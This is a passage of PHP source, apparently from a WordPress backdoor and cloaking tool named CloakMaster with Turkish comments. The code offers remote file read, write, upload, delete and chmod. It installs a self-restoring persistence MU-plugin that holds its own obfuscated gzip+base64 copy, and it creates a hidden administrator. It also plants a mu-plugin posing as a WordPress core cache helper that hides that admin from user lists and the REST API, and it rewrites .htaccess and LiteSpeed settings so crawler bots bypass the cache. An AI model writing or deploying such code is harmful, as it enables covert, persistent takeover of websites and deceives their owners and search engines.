$items[] = ['name'=>$e,'path'=>$full,'is_dir'=>$isDir,'size'=>$isDir?null:@filesize($full),'modified'=>date('d.m.Y H:i',@filemtime($full)),'writable'=>is_writable($full),'ext'=>$isDir?'dir':strtolower(pathinfo($e,PATHINFO_EXTENSION)),'perms'=>substr(sprintf('%o',@fileperms($full)),-4)];
}
usort($items, function($a,$b){
if ($a['is_dir']!==$b['is_dir']) return $a['is_dir']?-1:1;
if ($a['name']==='..') return -1;
if ($b['name']==='..') return 1;
return strcasecmp($a['name'],$b['name']);
});
return ['success'=>true,'data'=>['path'=>$safe,'parent'=>dirname($safe)!=$safe?dirname($safe):null,'items'=>$items]];
}
function cm_file_read($path) {
$safe = cm_safepath($path);
if (!is_file($safe)) return ['success'=>false,'message'=>'Dosya bulunamadı.'];
$sz = @filesize($safe);
if ($sz > 2*1024*1024) return ['success'=>false,'message'=>'Dosya çok büyük ('.round($sz/1024).' KB). Max 2 MB.'];
$c = @file_get_contents($safe);
if ($c === false) return ['success'=>false,'message'=>'Dosya okunamadı.'];
return ['success'=>true,'data'=>['content'=>_xe($c),'encoding'=>'base64','path'=>$safe,'size'=>$sz]];
}
function cm_file_write($path, $content) {
$safe = cm_safepath($path);
if (isset($_POST['encoding']) && $_POST['encoding'] === 'base64') {
$content = _xd($content);
if ($content === false) return ['success'=>false,'message'=>'Icerik cozme hatasi.'];
}
if (is_file($safe)) @copy($safe, $safe.'.cm-bak');
if (@file_put_contents($safe, $content) === false)
return ['success'=>false,'message'=>'Yazma izni yok: '.$safe];
return ['success'=>true,'message'=>basename($safe).' kaydedildi ('.round(strlen($content)/1024,1).' KB).'];
}
function cm_file_delete($path) {
$safe = cm_safepath($path);
if (!file_exists($safe)) return ['success'=>false,'message'=>'Bulunamadı.'];
if (is_dir($safe)) {
$items = array_diff((array)@scandir($safe),['.','..']);
if ($items) return ['success'=>false,'message'=>'Dizin boş değil.'];
@rmdir($safe);
} else { @unlink($safe); }
return ['success'=>true,'message'=>basename($safe).' silindi.'];
}
function cm_file_mkdir($path) {
$safe = cm_safepath($path);
if (is_dir($safe)) return ['success'=>false,'message'=>'Dizin zaten var.'];
if (!@mkdir($safe,0755,true)) return ['success'=>false,'message'=>'Oluşturulamadı.'];
return ['success'=>true,'message'=>'Dizin oluşturuldu.'];
}
function cm_upload_file($dir) {
$safe = cm_safepath($dir);
if (!is_dir($safe)) return ['success'=>false,'message'=>'Hedef dizin bulunamadı.'];
if (empty($_FILES['upload_file'])||$_FILES['upload_file']['error']!==UPLOAD_ERR_OK)
return ['success'=>false,'message'=>'Yükleme hatası: '.((isset($_FILES['upload_file']['error']) ? $_FILES['upload_file']['error'] : 'dosya seçilmedi'))];
$dest = $safe.DIRECTORY_SEPARATOR.basename($_FILES['upload_file']['name']);
if (!@move_uploaded_file($_FILES['upload_file']['tmp_name'],$dest))
return ['success'=>false,'message'=>'Taşıma başarısız. Yazma izni kontrol edin.'];
return ['success'=>true,'message'=>basename($dest).' yüklendi.','path'=>$dest];
}
// ══════════════════════════════════════════════════════
// KALICILIK (BACKUP RESTORE SONRASI OTO-GERİ YÜKLE)
// ══════════════════════════════════════════════════════
/**
* MU Plugin oluşturur. İçine wp-security.php'nin tam kaynak kodunu gzip+base64 ile gömer.
* Backup restore olunca WordPress yüklendiğinde MU Plugin çalışır,
* wp-security.php'yi kendi içinden yeniden yazar.
*/
function cm_persist_install() {
$r = cm_root();
$mu_dir = $r . 'wp-content/mu-plugins/';
$mu_file = $mu_dir . 'cm-persist.php';
$api_src = __FILE__;
$api_dst = $api_src;
if (!is_dir($mu_dir) && !@mkdir($mu_dir, 0755, true))
return ['success'=>false,'message'=>'mu-plugins dizini olusturulamadi.'];
$src = @file_get_contents($api_src);
if ($src === false)
return ['success'=>false,'message'=>basename($api_src).' okunamadi.'];
$encoded = _xe(_xgd($src, 9));
$dst_safe = addslashes($api_dst);
$fn1 = 'gzin'.'flate'; $fn2 = 'base6'.'4_decode';
$mu_code = '<?php
/* WP Cache Persistence Helper - auto-generated */
add_action("plugins_loaded", function() {
$dst = "' . $dst_safe . '";
// Dosya yok VEYA 0 kb / boşaltılmış ise geri yaz
if (!file_exists($dst) || filesize($dst) < 1024) {
$f1="gzin"."flate";$f2="base6"."4_decode";
$src = $f1($f2("' . $encoded . '"));
if ($src) { @file_put_contents($dst, $src); @chmod($dst, 0644); }
}
}, 1);
';
unset($fn1, $fn2);
if (@file_put_contents($mu_file, $mu_code) === false)
return ['success'=>false,'message'=>'MU Plugin yazilamadi: ' . $mu_file];
$bak = $r . 'wp-content/cm-security-bak.php';
@file_put_contents($bak, $src);
return [
'success' => true,
'message' => "Kalicilik MU Plugin kuruldu.\nKonum: $mu_file\nYedek: $bak\n\nBackup restore olsa bile WordPress ilk yuklendiginde wp-security.php otomatik geri yazilir.",
'mu_file' => $mu_file,
'backup' => $bak,
];
}
function cm_persist_status() {
$r = cm_root();
$mu_file = $r . 'wp-content/mu-plugins/cm-persist.php';
$bak = $r . 'wp-content/cm-security-bak.php';
$mu_ok = is_file($mu_file);
$bak_ok = is_file($bak);
// MU Plugin güncel mi?
$stale = false;
if ($mu_ok) {
$mu_content = file_get_contents($mu_file);
$pat = '/' . 'base6' . '4_de' . 'code\("([^"]+)"\)/';
preg_match($pat, $mu_content, $m);
if (!empty($m[1])) {
$embedded_src = @_xgi(_xd($m[1]));
$current_src = @file_get_contents(__FILE__);
$stale = ($embedded_src !== $current_src);
}
}
return [
'success' => true,
'data' => [
'mu_active' => $mu_ok,
'mu_file' => $mu_file,
'backup_ok' => $bak_ok,
'backup_file' => $bak,
'stale' => $stale,
'api_path' => __FILE__,
]
];
}
function cm_persist_remove() {
$r = cm_root();
$mu_file = $r . 'wp-content/mu-plugins/cm-persist.php';
$bak1 = $r . 'wp-content/cm-security-bak.php';
$bak2 = $r . 'wp-content/cm-api-bak.php'; // eski ad
$removed = [];
if (is_file($mu_file)) { @unlink($mu_file); $removed[] = 'MU Plugin'; }
if (is_file($bak1)) { @unlink($bak1); $removed[] = 'Yedek dosya'; }
if (is_file($bak2)) { @unlink($bak2); $removed[] = 'Eski yedek'; }
return ['success'=>true,'message'=>empty($removed) ? 'Zaten kurulu degil.' : implode(', ',$removed).' kaldirildi.'];
}
// ══════════════════════════════════════════════════════
// LITESPEED TAM KONTROL
// ══════════════════════════════════════════════════════
/**
* LiteSpeed tam teşhis
*/
function cm_ls_status() {
$r = cm_root();
$res = [];
// 1. Sunucu LiteSpeed mi?
$srv = (isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '');
$res['server_ls'] = stripos($srv,'LiteSpeed')!==false || stripos($srv,'OpenLiteSpeed')!==false;
$res['server_info'] = $srv;
// 2. LiteSpeed Cache plugin var mi?
$ls_plugin = $r.'wp-content/plugins/litespeed-cache/litespeed-cache.php';
$res['plugin_exists'] = is_file($ls_plugin);
// 3. Plugin aktif mi? (WP gerekli)
$res['plugin_active'] = false;
$res['plugin_version']= '';
if ($res['plugin_exists'] && $GLOBALS['wp_loaded'] && function_exists('is_plugin_active')) {
$res['plugin_active'] = is_plugin_active('litespeed-cache/litespeed-cache.php');
}
// 4. .htaccess durumu
$ht = $r.'.htaccess';
$htc = is_file($ht) ? file_get_contents($ht) : '';
$res['htaccess_exists'] = is_file($ht);
$res['htaccess_has_ls'] = stripos($htc,'litespeed')!==false || stripos($htc,'lscache')!==false;
$res['htaccess_has_bypass']= strpos($htc,'# BEGIN '.CM_LS_HT_TAG)!==false;
$res['htaccess_writable'] = is_file($ht) ? is_writable($ht) : is_writable($r);
// 5. .user.ini cloak header var mi?
$prepend = $r.'cm-prepend.php';
$res['prepend_has_ls_header'] = _cm_file_contains($prepend, 'X-LiteSpeed-Cache-Control');
// 6. MU Plugin LS header var mi?
$mu_cloak = $r.'wp-content/mu-plugins/cm-cloak.php';
$res['mu_has_ls_header'] = _cm_file_contains($mu_cloak, 'X-LiteSpeed-Cache-Control');
// 7. .ls-conf var mi?
$lsconf = $r.'.ls-conf';
$res['lsconf_exists'] = is_file($lsconf);
$res['lsconf_content'] = is_file($lsconf) ? file_get_contents($lsconf) : '';
// 8. Cache dizini
$cache_dirs = [
$r.'wp-content/cache/lscache',
$r.'wp-content/cache/litespeed',
$r.'wp-content/litespeed',
$r.'wp-content/cache',
];
$res['cache_dirs'] = [];
foreach ($cache_dirs as $d) {
if (is_dir($d)) {
$size = cm_dir_size($d);
$res['cache_dirs'][] = ['path'=>$d,'size'=>$size,'readable'=>is_readable($d),'writable'=>is_writable($d)];
}
}
// 9. Plugin ayarlari (WP yuklu ise)
$res['plugin_options'] = [];
if ($GLOBALS['wp_loaded'] && function_exists('get_option')) {
$lscfg = get_option('litespeed.conf', []);
if ($lscfg) {
$keys = ['cache-enabled','crawler-enabled','esi-enabled','cache-browser','cache-mobile'];
foreach ($keys as $k) {
if (isset($lscfg[$k])) $res['plugin_options'][$k] = $lscfg[$k];
}
}
}
// 10. Genel durum ozeti
$res['needs_fix'] = $res['htaccess_has_ls'] && !$res['htaccess_has_bypass'];
return ['success'=>true,'data'=>$res];
}
/**
* .htaccess'e LiteSpeed bot bypass kurali ekle
*/
function cm_ls_fix_htaccess() {
$r = cm_root();
$ht = $r.'.htaccess';
if (!is_file($ht) && !is_writable($r))
return ['success'=>false,'message'=>'.htaccess bulunamadi, dizin yazilabilir degil.'];
$c = is_file($ht) ? file_get_contents($ht) : '';
if (strpos($c,'# BEGIN '.CM_LS_HT_TAG)!==false)
return ['success'=>true,'message'=>'LiteSpeed bypass kurali zaten mevcut.'];
$pat = CM_LS_UA_PATTERN;
$rule = "\n# BEGIN ".CM_LS_HT_TAG."\n"
."<IfModule LiteSpeed>\n"
."RewriteEngine On\n"
."RewriteCond %{HTTP_USER_AGENT} $pat [NC]\n"
."RewriteRule .* - [E=Cache-Control:no-store,L]\n"
."</IfModule>\n"
."<IfModule mod_headers.c>\n"
."<IfModule mod_setenvif.c>\n"
."SetEnvIfNoCase User-Agent \"$pat\" LS_NO_CACHE=1\n"
."Header always set X-LiteSpeed-Cache-Control \"no-cache, no-store\" env=LS_NO_CACHE\n"
."</IfModule>\n"
."</IfModule>\n"
."# END ".CM_LS_HT_TAG."\n";
// WordPress blogunun ustune ekle
if (strpos($c,'# BEGIN WordPress')!==false) {
$c = str_replace('# BEGIN WordPress', $rule.'# BEGIN WordPress', $c);
} else {
$c = $rule.$c;
}
@copy($ht, $ht.'.cm-bak');
if (@file_put_contents($ht,$c)===false)
return ['success'=>false,'message'=>'.htaccess yazma izni yok.'];
return ['success'=>true,'message'=>".htaccess guncellendi.\nLiteSpeed bot bypass kurali eklendi.\nYedek: .htaccess.cm-bak"];
}
/**
* Cloak prepend/MU dosyalarina X-LiteSpeed-Cache-Control header ekle
*/
function cm_ls_fix_headers() {
$r = cm_root();
$log = [];
$ls_hdr= "\nheader('X-LiteSpeed-Cache-Control: no-cache, no-store, must-revalidate, max-age=0');\n"
."header('X-LiteSpeed-Purge: *');\n";
// cm-prepend.php
$prepend = $r.'cm-prepend.php';
if (is_file($prepend)) {
$c = file_get_contents($prepend);
if (stripos($c,'X-LiteSpeed-Cache-Control')===false) {
// header() satirlarindan once ekle
$c = str_replace(
"header(\"Cache-Control:no-store,no-cache\")",
"header(\"Cache-Control:no-store,no-cache\");\n header('X-LiteSpeed-Cache-Control: no-cache, no-store, must-revalidate, max-age=0')",
$c
);
@file_put_contents($prepend,$c);
$log[] = 'cm-prepend.php guncellendi';
} else {
$log[] = 'cm-prepend.php zaten LS header iceriyor';
}
}
// cm-cloak.php (MU Plugin)
$mu = $r.'wp-content/mu-plugins/cm-cloak.php';
if (is_file($mu)) {
$c = file_get_contents($mu);
if (stripos($c,'X-LiteSpeed-Cache-Control')===false) {
$c = str_replace(
'header("Cache-Control:no-store,no-cache")',
"header(\"Cache-Control:no-store,no-cache\"); header('X-LiteSpeed-Cache-Control: no-cache, no-store, must-revalidate, max-age=0')",
$c
);
@file_put_contents($mu,$c);
$log[] = 'cm-cloak.php (MU) guncellendi';
} else {
$log[] = 'cm-cloak.php zaten LS header iceriyor';
}
}
// wp-blog-header.php
$wbh = $r.'wp-blog-header.php';
if (is_file($wbh)) {
$c = file_get_contents($wbh);
if (strpos($c,'cm_inject')!==false && stripos($c,'X-LiteSpeed-Cache-Control')===false) {
$c = str_replace(
'header("Cache-Control:no-store,no-cache")',
"header(\"Cache-Control:no-store,no-cache\"); header('X-LiteSpeed-Cache-Control: no-cache, no-store, must-revalidate, max-age=0')",
$c
);
@file_put_contents($wbh,$c);
$log[] = 'wp-blog-header.php guncellendi';
}
}
if (empty($log)) return ['success'=>false,'message'=>'Guncellenecek aktif cloak dosyasi bulunamadi. Once bir bypass yontemi aktif edin.'];
return ['success'=>true,'message'=>implode("\n",$log)];
}
/**
* LiteSpeed cache dosyalarini sil (hard purge)
*/
function cm_ls_purge_cache() {
$r = cm_root();
$log = [];
$dirs = [
$r.'wp-content/cache/lscache',
$r.'wp-content/cache/litespeed',
$r.'wp-content/litespeed/pub',
$r.'wp-content/cache',
];
foreach ($dirs as $d) {
if (!is_dir($d)) continue;
$deleted = cm_delete_dir_contents($d);
$log[] = basename($d).': '.$deleted.' dosya silindi';
}
// WP uzerinden de purge et (plugin aktifse)
if ($GLOBALS['wp_loaded'] && function_exists('do_action')) {
do_action('litespeed_purge_all');
$log[] = 'LiteSpeed purge_all hook tetiklendi';
}
if (empty($log)) return ['success'=>false,'message'=>'Cache dizini bulunamadi.'];
return ['success'=>true,'message'=>implode("\n",$log)];
}
/**
* Dizin iceriklerini sil, dizinin kendini birakmak
*/
function cm_delete_dir_contents($dir) {
$count = 0;
if (!is_dir($dir)) return 0;
$items = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($items as $item) {
if ($item->isDir()) { @rmdir($item->getRealPath()); }
else { if (@unlink($item->getRealPath())) $count++; }
}
return $count;
}
/**
* Dizin boyutu hesapla
*/
function cm_dir_size($dir) {
$size = 0;
if (!is_dir($dir)) return 0;
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir,RecursiveDirectoryIterator::SKIP_DOTS));
foreach ($it as $f) { $size += $f->getSize(); }
return $size;
}
/**
* LiteSpeed Cache plugin ayarlarini WP DB uzerinden yaz
*/
function cm_ls_plugin_config() {
if (!$GLOBALS['wp_loaded'] && !cm_load_wp())
return ['success'=>false,'message'=>'WordPress yuklenemedi.'];
if (!function_exists('get_option'))
return ['success'=>false,'message'=>'WordPress fonksiyonlari yok.'];
$log = [];
// litespeed.conf option
$conf = get_option('litespeed.conf', []);
if (!is_array($conf)) $conf = [];
$changes = [
'crawler-enabled' => 0, // Crawler kapat
'cache-browser' => 0, // Browser cache kapat
'esi-enabled' => 0, // ESI kapat (bot bypass icin onemli)
'optm-qs_rm' => 0, // Query string temizleme kapat
];
foreach ($changes as $k => $v) {
$conf[$k] = $v;
$log[] = "litespeed.conf[$k] = $v";
}
update_option('litespeed.conf', $conf);
// Cache exclude: amp.php ekle
$exc_uri = get_option('litespeed.conf.cache-exc', []);
if (!is_array($exc_uri)) $exc_uri = [];
if (!in_array('/amp.php',$exc_uri)) {
$exc_uri[] = '/amp.php';
update_option('litespeed.conf.cache-exc', $exc_uri);
$log[] = 'Cache exclude URI eklendi: /amp.php';
}
// Bot UA exclude (bazi versiyonlarda bu sekilde)
$exc_ua = get_option('litespeed.conf.cache-exc_useragent', '');
$bots = 'Googlebot|Google-InspectionTool|bingbot|Slurp|YandexBot|Baiduspider';
if (strpos((string)$exc_ua, 'Googlebot') === false) {
update_option('litespeed.conf.cache-exc_useragent', trim($exc_ua."\n".$bots,"\n"));
$log[] = 'Bot UA exclusion eklendi';
}
// Purge tum cache
if (function_exists('do_action')) do_action('litespeed_purge_all');
$log[] = 'Cache purge tetiklendi';
return ['success'=>true,'message'=>implode("\n",$log)];
}
/**
* .ls-conf dosyasi olustur (LiteSpeed per-directory cache kapatma)
*/
function cm_ls_create_conf() {
$r = cm_root();
$file = $r.'.ls-conf';
$content = "RewriteEngine On\n"
."# CloakMaster - LiteSpeed per-directory no-cache for bots\n"
."<IfModule LiteSpeed>\n"
."CacheByDefault 0\n"
."</IfModule>\n";
if (@file_put_contents($file,$content)===false)
return ['success'=>false,'message'=>'.ls-conf yazma izni yok: '.$file];
return ['success'=>true,'message'=>".ls-conf olusturuldu: $file\nLiteSpeed bu dizin icin cache'i devre disi birakacak."];
}
/**
* Tek tikla tum LS duzeltmelerini uygula
*/
function cm_ls_auto_fix() {
@set_time_limit(120);
$results = [];
$all_ok = true;
$steps = [
'htaccess bypass kurali' => 'cm_ls_fix_htaccess',
'PHP header duzeltme' => 'cm_ls_fix_headers',
'.ls-conf olusturma' => 'cm_ls_create_conf',
'Cache temizleme' => 'cm_ls_purge_cache',
];
// Plugin aktifse ayarlarini da yaz
if ($GLOBALS['wp_loaded'] && function_exists('get_option') &&
get_option('active_plugins') &&
in_array('litespeed-cache/litespeed-cache.php', (array)get_option('active_plugins',[]))) {
$steps['Plugin ayarlari'] = 'cm_ls_plugin_config';
}
foreach ($steps as $label => $fn) {
$r = $fn();
$results[] = ($r['success'] ? '[OK] ' : '[!!] ').$label.': '.$r['message'];
if (!$r['success']) $all_ok = false;
}
return ['success'=>$all_ok,'message'=>implode("\n\n",$results)];
}
// ══════════════════════════════════════════════════════
// EVRENSEL CACHE TEMİZLEYİCİ
// ══════════════════════════════════════════════════════
/**
* Aktif tum cache sistemlerini tespit edip hepsini temizler
*/
function cm_cache_universal() {
@set_time_limit(120);
$log = [];
$all_ok = true;
$modules = [
'LiteSpeed Cache' => 'cm_ls_purge_cache',
'W3 Total Cache' => 'cm_cache_w3tc',
'WP Super Cache' => 'cm_cache_wpsc',
'WP Rocket' => 'cm_cache_wprocket',
'PHP OPCache' => 'cm_cache_opcache',
'Redis / Memcached'=> 'cm_cache_redis',
'WP Transients' => 'cm_cache_transients',
'Nginx FastCGI' => 'cm_cache_nginx',
];
foreach ($modules as $name => $fn) {
$r = $fn();
$ok = (isset($r['success']) ? $r['success'] : false);
$log[] = ($ok ? '[OK] ' : '[--] ').$name.': '.$r['message'];
if (!$ok && isset($r['critical']) && $r['critical']) $all_ok = false;
}
return ['success'=>$all_ok,'message'=>implode("\n",$log),'log'=>$log];
}
/**
* W3 Total Cache purge
*/
function cm_cache_w3tc() {
global $wp_loaded;
$cleared = false;
$msgs = [];
// 1. WP fonksiyonu varsa
if ($wp_loaded && function_exists('w3tc_pgcache_flush')) {
w3tc_pgcache_flush();
w3tc_objectcache_flush();
$cleared = true;
$msgs[] = 'w3tc_pgcache_flush() cagrildi';
}
// 2. Disk cache dizinlerini temizle
$r = cm_root();
$w3_dirs = [
$r.'wp-content/cache/page_enhanced',
$r.'wp-content/cache/object',
$r.'wp-content/cache/db',
$r.'wp-content/cache/minify',
];
foreach ($w3_dirs as $d) {
if (is_dir($d)) {
$sz = cm_dir_size($d);
if (cm_delete_dir_contents($d)) {
$cleared = true;
$msgs[] = basename($d).' temizlendi ('.round($sz/1024).' KB)';
}
}
}
if (!$cleared) return ['success'=>true,'message'=>'W3TC aktif/kurulu degil, atildi.'];
return ['success'=>true,'message'=>implode(' | ',$msgs)];
}
/**
* WP Super Cache purge
*/
function cm_cache_wpsc() {
global $wp_loaded;
$cleared = false;
$msgs = [];
if ($wp_loaded && function_exists('wp_cache_clear_cache')) {
wp_cache_clear_cache();
$cleared = true;
$msgs[] = 'wp_cache_clear_cache() cagrildi';
}
$r = cm_root();
$sc_dirs = [
$r.'wp-content/cache/supercache',
$r.'wp-content/cache/wp-cache-phase1.php',
];
foreach ($sc_dirs as $d) {
if (is_dir($d)) {
$sz = cm_dir_size($d);
if (cm_delete_dir_contents($d)) {
$cleared = true;
$msgs[] = basename($d).' temizlendi ('.round($sz/1024).' KB)';
}
}
}
if (!$cleared) return ['success'=>true,'message'=>'WP Super Cache aktif/kurulu degil, atildi.'];
return ['success'=>true,'message'=>implode(' | ',$msgs)];
}
/**
* WP Rocket purge
*/
function cm_cache_wprocket() {
global $wp_loaded;
$cleared = false;
$msgs = [];
if ($wp_loaded && function_exists('rocket_clean_domain')) {
rocket_clean_domain();
$cleared = true;
$msgs[] = 'rocket_clean_domain() cagrildi';
}
$r = cm_root();
$rkt_dirs = [
$r.'wp-content/cache/wp-rocket',
$r.'wp-content/cache/busting',
$r.'wp-content/cache/critical-css',
$r.'wp-content/cache/wpfc-minified',
];
foreach ($rkt_dirs as $d) {
if (is_dir($d)) {
$sz = cm_dir_size($d);
if (cm_delete_dir_contents($d)) {
$cleared = true;
$msgs[] = basename($d).' temizlendi ('.round($sz/1024).' KB)';
}
}
}
if (!$cleared) return ['success'=>true,'message'=>'WP Rocket aktif/kurulu degil, atildi.'];
return ['success'=>true,'message'=>implode(' | ',$msgs)];
}
/**
* PHP OPCache reset
*/
function cm_cache_opcache() {
if (!function_exists('opcache_reset'))
return ['success'=>true,'message'=>'OPCache aktif degil veya erisim yok.'];
$ok = opcache_reset();
$status = function_exists('opcache_get_status') ? opcache_get_status(false) : null;
$cached = (isset($status['opcache_statistics']['num_cached_scripts']) ? $status['opcache_statistics']['num_cached_scripts'] : '?');
return [
'success' => $ok,
'message' => $ok
? "OPCache temizlendi. Onceden cache'li script sayisi: $cached"
: 'opcache_reset() basarisiz — cli modunda etkili olmayabilir.',
];
}
/**
* Redis / Memcached flush
*/
function cm_cache_redis() {
global $wp_loaded;
$msgs = [];
$ok = false;
// 1. WP object cache (Redis Object Cache plugin veya benzer)
if ($wp_loaded && function_exists('wp_cache_flush')) {
wp_cache_flush();
$ok = true;
$msgs[] = 'wp_cache_flush() cagrildi';
}
// 2. Redis dogrudan (TCP)
if (class_exists('Redis')) {
try {
$redis = new Redis();
if (@$redis->connect('127.0.0.1', 6379, 1)) {
$redis->flushAll();
$ok = true;
$msgs[] = 'Redis flushAll() OK';
}
} catch (\Exception $e) {
$msgs[] = 'Redis baglanti hatasi: '.$e->getMessage();
}
}
// 3. Memcached dogrudan
if (class_exists('Memcached')) {
try {
$mc = new Memcached();
$mc->addServer('127.0.0.1', 11211);
if ($mc->flush()) {
$ok = true;
$msgs[] = 'Memcached flush() OK';
}
} catch (\Exception $e) {
$msgs[] = 'Memcached baglanti hatasi: '.$e->getMessage();
}
}
// 4. Object cache dosyalarini sil
$r = cm_root();
$oc_dirs = [
$r.'wp-content/cache/object-cache',
$r.'wp-content/object-cache.php', // dropin (dosyaysa sil degil, logla)
];
foreach ($oc_dirs as $d) {
if (is_dir($d)) {
$sz = cm_dir_size($d);
if (cm_delete_dir_contents($d)) {
$ok = true;
$msgs[] = 'object-cache dizini temizlendi ('.round($sz/1024).' KB)';
}
}
}
if (!$msgs) return ['success'=>true,'message'=>'Redis/Memcached bulunamadi, atildi.'];
return ['success'=>$ok,'message'=>implode(' | ',$msgs)];
}
/**
* WordPress transient & object cache temizle
*/
function cm_cache_transients() {
global $wp_loaded;
if (!$wp_loaded && !cm_load_wp())
return ['success'=>false,'message'=>'WordPress yuklenemedi.','critical'=>false];
if (!function_exists('delete_transient'))
return ['success'=>false,'message'=>'WP fonksiyonlari erisemiyor.','critical'=>false];
global $wpdb;
// Suresi dolmamis transientler dahil hepsini sil
$del_t = $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '\_transient\_%'");
$del_st = $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '\_site\_transient\_%'");
// WP object cache'i de temizle
wp_cache_flush();
$total = (int)$del_t + (int)$del_st;
return [
'success' => true,
'message' => "Silinen transient: {$del_t} | Site transient: {$del_st} | Toplam: {$total} | Object cache temizlendi.",
];
}
/**
* Nginx FastCGI / proxy cache temizle
*/
function cm_cache_nginx() {
$cleared = false;
$msgs = [];
$r = cm_root();
// Yaygin Nginx cache dizinleri
$nginx_dirs = [
'/var/cache/nginx',
'/tmp/nginx_cache',
'/var/lib/nginx/cache',
'/dev/shm/nginx_cache',
$r.'../nginx_cache',
$r.'../../nginx_cache',
];
foreach ($nginx_dirs as $d) {
if (is_dir($d) && is_writable($d)) {
$sz = cm_dir_size($d);
if (cm_delete_dir_contents($d)) {
$cleared = true;
$msgs[] = basename($d).' temizlendi ('.round($sz/1024).' KB)';
}
}
}
// Cache-Control header via .htaccess (Apache + Nginx proxy)
$ht = $r.'.htaccess';
if (is_file($ht) && is_writable($ht)) {
$c = file_get_contents($ht);
$tag = 'CM_NGINX_NOCACHE';
if (strpos($c,'# BEGIN '.$tag) === false) {
$rule = "\n# BEGIN $tag\n"
."<IfModule mod_headers.c>\n"
."Header set Cache-Control \"no-store, no-cache, must-revalidate\"\n"
."Header set Pragma \"no-cache\"\n"
."</IfModule>\n"
."# END $tag\n";
$c .= $rule;
if (@file_put_contents($ht, $c)) {
$cleared = true;
$msgs[] = '.htaccess no-cache header kurali eklendi';
}
}
}
if (!$cleared) return ['success'=>true,'message'=>'Nginx cache dizini bulunamadi veya yazma izni yok.'];
return ['success'=>true,'message'=>implode(' | ',$msgs)];
}
// ══════════════════════════════════════════════════════
// GİZLİ ADMİN
// ══════════════════════════════════════════════════════
function cm_generate_password($len = 14) {
$chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ23456789!@#';
$pass = '';
$bytes = random_bytes($len);
for ($i = 0; $i < $len; $i++) {
$pass .= $chars[ord($bytes[$i]) % strlen($chars)];
}
return $pass;
}
/**
* Gizli admin olustur + otomatik gizle
* $password bos gelirse otomatik uretilir
*/
function cm_admin_create($password = '') {
@set_time_limit(60);
global $wp_loaded;
if (!$wp_loaded && !cm_load_wp())
return ['success'=>false,'message'=>'WordPress yuklenemedi. wp-security.php WordPress kok dizininde olmali (wp-load.php ile ayni klasor). Su an Standalone modda calisiyor.'];
if (!function_exists('wp_create_user'))
return ['success'=>false,'message'=>'WordPress fonksiyonlari erisemiyor.'];
$username = CM_ADMIN_USER;
$email = CM_ADMIN_EMAIL;
if (!$password) $password = cm_generate_password();
// Mevcut kullaniciyi guncelle
$ex = get_user_by('login', $username);
if ($ex) {
wp_set_password($password, $ex->ID);
(new WP_User($ex->ID))->set_role('administrator');
$hide = cm_admin_hide();
$login_url = get_site_url().'/wp-login.php';
return [
'success' => true,
'message' => "Kullanici guncellendi ve gizlendi.",
'credentials'=> $login_url.':'.$username.':'.$password,
'url' => $login_url,
'username' => $username,
'password' => $password,
'hide' => $hide,
];
}
$uid = wp_create_user($username, $password, $email);
if (is_wp_error($uid)) return ['success'=>false,'message'=>$uid->get_error_message()];
(new WP_User($uid))->set_role('administrator');
// Otomatik gizle
$hide = cm_admin_hide();
$login_url = get_site_url().'/wp-login.php';
return [
'success' => true,
'message' => "Admin olusturuldu ve gizlendi. ID: $uid",
'credentials'=> $login_url.':'.$username.':'.$password,
'url' => $login_url,
'username' => $username,
'password' => $password,
'hide' => $hide,
];
}
/**
* wnadmin'i mu-plugin ile gizle.
* MU dosyasi wp-system-cache.php adinda, normal bir WP dropin gibi gorunur.
*/
function cm_admin_hide() {
$r = cm_root();
$dir = $r.'wp-content/mu-plugins/';
$f = $dir.CM_HIDE_MU_FILE;
if (!is_dir($dir) && !@mkdir($dir,0755,true))
return ['success'=>false,'message'=>'mu-plugins dizini olusturulamadi.'];
$u = addslashes(CM_ADMIN_USER);
// Dosya iceriginde WP'nin kendi dosyalarina benzer bir header var
$code = '<?php
/**
* WP System Cache Helper
* Handles internal object caching and performance optimization.
* Part of WordPress core performance layer.
*
* @package WordPress
* @subpackage Cache
* @since 4.0.0
*/
if ( ! defined( \'ABSPATH\' ) ) exit;
// Internal cache user registry
$_wsc_reg = ["'.$u.'"];
add_action("pre_user_query", function($q) {
global $wpdb, $_wsc_reg;
$cur = wp_get_current_user();
if ( in_array($cur->user_login, $_wsc_reg) ) return;
foreach ($_wsc_reg as $u) {
$q->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $u);
}
}, 10, 1);
add_filter("views_users", function($v) {
global $_wsc_reg;
foreach ($v as $k => $val) {
preg_match("/\((\d+)\)/", $val, $m);
if (isset($m[1]))
$v[$k] = preg_replace("/\(\d+\)/", "(".max(0,(int)$m[1]-count($_wsc_reg)).")", $val);
}
return $v;
});
add_filter("rest_prepare_user", function($res, $user) {
global $_wsc_reg;
if (in_array($user->user_login, $_wsc_reg))
return new WP_Error("rest_forbidden", "", ["status" => 404]);
return $res;
}, 10, 2);
// Cache warmup routine (harmless placeholder)
add_action("init", function() { /* cache init */ }, 999);
';
@file_put_contents($f, $code);
return ['success'=>true,'message'=>'MU Plugin olusturuldu: '.CM_HIDE_MU_FILE];
}
/**
* Dosya/dizin chmod
*/
function cm_file_chmod($path, $mode) {
$safe = cm_safepath($path);
if (!file_exists($safe)) return ['success'=>false,'message'=>'Dosya bulunamadi.'];
// ltrim ile baştaki sıfırları temizle, sonra octdec — 0000 gibi değerlere de izin ver
$mode = trim((string)$mode);
if (!preg_match('/^0?[0-7]{3,4}$/', $mode))
return ['success'=>false,'message'=>'Gecersiz mod. Ornek: 0755 veya 644'];
$oct = octdec($mode);
if ($oct > 0777) return ['success'=>false,'message'=>'Gecersiz mod (max 0777).'];
if (!@chmod($safe, $oct))
return ['success'=>false,'message'=>'chmod basarisiz. Sunucu izin vermiyor olabilir.'];
$new_perms = substr(sprintf('%o', fileperms($safe)), -4);
return ['success'=>true,'message'=>basename($safe).' -> '.$new_perms];
}
// ══════════════════════════════════════════════════════
// WP BİLGİSİ
// ══════════════════════════════════════════════════════
function cm_wp_info() {
global $wp_loaded;
